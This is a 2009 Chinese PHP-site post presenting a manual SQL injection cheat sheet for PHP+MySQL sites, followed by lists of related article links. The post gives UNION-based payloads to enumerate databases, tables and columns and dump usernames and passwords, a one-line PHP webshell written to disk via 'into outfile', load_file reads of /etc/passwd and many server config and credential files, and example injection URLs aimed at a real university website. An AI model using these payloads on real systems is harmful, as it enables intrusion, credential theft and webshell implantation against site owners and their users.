PHP+MySQL 手工注入语句大全 推荐


Posted in PHP onOctober 30, 2009

暴字段长度

Order by num/*

匹配字段

and 1=1 union select 1,2,3,4,5…….n/*

暴字段位置

and 1=2 union select 1,2,3,4,5…..n/*

利用内置函数暴数据库信息

version() database() user()  

不用猜解可用字段暴数据库信息(有些网站不适用):

and 1=2 union all select version() /*

and 1=2 union all select database() /*

and 1=2 union all select user() /*

操作系统信息:

and 1=2 union all select @@global.version_compile_os from mysql.user /*

数据库权限:

and ord(mid(user(),1,1))=114 /* 返回正常说明为root

暴库 (mysql>5.0)

Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息

and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1

猜表

and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—

猜字段

and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1

暴密码

and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1

高级用法(一个可用字段显示两个数据内容)

Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1

直接写马(Root权限)

条件:1、知道站点物理路径

       2、有足够大的权限(可以用select …. from mysql.user测试)

       3、magic_quotes_gpc()=OFF

select   ‘<?php eval($_POST[cmd])?>'   into outfile ‘物理路径'

and 1=2 union all select 一句话HEX值 into outfile '路径'

load_file() 常用路径:

1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)

2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录

4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件

5、c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf 查看WINDOWS系统apache文件

6、c:/Resin-3.0.14/conf/resin.conf   查看jsp开发的网站 resin文件配置信息.

7、c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机

8、d:\APACHE\Apache2\conf\httpd.conf

9、C:\Program Files\mysql\my.ini

10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径

11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件

12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看

13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上

14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看

15、 /etc/sysconfig/iptables 本看防火墙策略

16 、 usr/local/app/php5 b/php.ini PHP 的相当设置

17 、/etc/my.cnf MYSQL的配置文件

18、 /etc/redhat-release   红帽子的系统版本

19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.

21、/usr/local/app/php5 b/php.ini //PHP相关设置

22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置

23、C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini

24、c:\windows\my.ini
       25、c:\boot.ini

网站常用配置文件 config.inc.php、config.php。load_file()时要用replace(load_file(HEX),char(60),char(32))

注:

Char(60)表示 <

Char(32)表示 空格

手工注射时出现的问题:

当注射后页面显示:

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

如:http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x433A5C626F6F742E696E69),3,4,user()%20

这是由于前后编码不一致造成的,

解决方法:在参数前加上 unhex(hex(参数))就可以了。上面的URL就可以改为:

http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))%20

既可以继续注射了。。。

PHP 相关文章推荐
PHP中$_SERVER的详细参数与说明
Jul 29 PHP
不要轻信 PHP_SELF的安全问题
Sep 05 PHP
PHP 魔术函数使用说明
May 14 PHP
C#使用PHP服务端的Web Service通信实例
Apr 08 PHP
thinkphp使用phpmailer发送邮件的方法
Nov 24 PHP
codeigniter显示所有脚本执行时间的方法
Mar 21 PHP
PHP安装memcached扩展笔记
May 28 PHP
功能强大的PHP图片处理类(水印、透明度、旋转)
Oct 21 PHP
PHP类型约束用法示例
Sep 28 PHP
PHP基于接口技术实现简单的多态应用完整实例
Apr 26 PHP
Thinkphp5行为使用方法汇总
Dec 21 PHP
PHP5.0~5.6 各版本兼容性cURL文件上传功能实例分析
May 11 PHP
php 攻击方法之谈php+mysql注射语句构造
Oct 30 #PHP
PHP 文件上传源码分析(RFC1867)
Oct 30 #PHP
浅谈PHP 闭包特性在实际应用中的问题
Oct 30 #PHP
php实现jQuery扩展函数
Oct 30 #PHP
PHP 读取和修改大文件的某行内容的代码
Oct 30 #PHP
PHP 批量删除数据的方法分析
Oct 30 #PHP
ThinkPHP php 框架学习笔记
Oct 30 #PHP
You might like
使用PHP备份MYSQL数据的多种方法
2014/01/15 PHP
php实现多城市切换特效
2015/08/09 PHP
php开发工具有哪五款
2015/11/09 PHP
php 修改上传文件大小限制实例详解
2016/10/23 PHP
在Laravel 的 Blade 模版中实现定义变量
2019/10/14 PHP
php+mysql+ajax 局部刷新点赞/取消点赞功能(每个账号只点赞一次)
2020/07/24 PHP
Exjs 入门篇
2010/04/07 Javascript
Javascript JSQL,SQL无处不在,
2010/05/05 Javascript
六款帮助你实现惊艳视差滚动效果的jQuery插件
2012/09/14 Javascript
利用Javascript判断操作系统的类型实现不同操作系统下的兼容性
2013/01/29 Javascript
jQuery中:not选择器用法实例
2014/12/30 Javascript
详解JavaScript中的Unescape()和String() 函数
2015/11/09 Javascript
深入探究JavaScript中for循环的效率问题及相关优化
2016/03/13 Javascript
php基于redis处理session的方法
2016/03/14 Javascript
jQuery操作iframe中js函数的方法小结
2016/07/06 Javascript
轻松掌握JavaScript装饰者模式
2016/08/27 Javascript
jQuery tagsinput在h5邮件客户端中应用详解
2016/09/26 Javascript
vue.js加载新的内容(实例代码)
2017/06/01 Javascript
bootstrap Table插件使用demo
2017/08/07 Javascript
JS实现颜色的10进制转化成rgba格式的方法
2017/09/04 Javascript
解决vue.js this.$router.push无效的问题
2018/09/03 Javascript
vue 内置过滤器的使用总结(附加自定义过滤器)
2018/12/11 Javascript
vue项目打包上传github并制作预览链接(pages)
2019/04/19 Javascript
js实现上下左右键盘控制div移动
2020/01/16 Javascript
解决vue-cli输入命令vue ui没效果的问题
2020/11/17 Javascript
python用pickle模块实现“增删改查”的简易功能
2017/06/07 Python
Python实现时钟显示效果思路详解
2018/04/11 Python
Python企业编码生成系统之主程序模块设计详解
2019/07/26 Python
PyQt5+python3+pycharm开发环境配置教程
2020/03/24 Python
CSS3 transition 实现通知消息轮播条
2020/10/14 HTML / CSS
军校本科大学生自我评价
2014/01/14 职场文书
法律系毕业生求职信
2014/05/28 职场文书
应届毕业生自荐信
2014/05/28 职场文书
公司出差管理制度范本
2015/08/05 职场文书
Linux系统下MySQL配置主从分离的步骤
2022/03/21 MySQL
Win11 Build 25179预览版发布(附更新内容+ISO官方镜像下载)
2022/08/14 数码科技